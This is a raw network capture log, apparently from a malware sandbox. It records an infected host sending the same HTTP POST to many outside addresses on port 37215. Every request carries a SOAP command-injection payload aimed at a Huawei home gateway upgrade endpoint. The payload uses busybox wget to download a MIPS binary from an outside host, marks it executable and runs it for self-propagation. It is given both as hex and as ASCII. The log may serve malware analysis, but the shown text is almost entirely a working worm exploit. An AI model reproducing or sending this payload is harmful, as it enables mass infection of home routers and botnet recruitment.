                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1482192.168.2.1549386157.65.108.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.830619097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1483192.168.2.154151497.242.99.16237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.830631971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1484192.168.2.1547314157.132.57.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.835688114 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1485192.168.2.153603841.128.102.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.835866928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1486192.168.2.155381641.218.56.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.835884094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1487192.168.2.1554730218.244.20.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.843630075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1488192.168.2.1543990157.3.50.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.843781948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1489192.168.2.1552404197.252.232.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.843785048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1490192.168.2.1543502197.233.204.20637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.846376896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1491192.168.2.154255641.190.122.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.846524000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
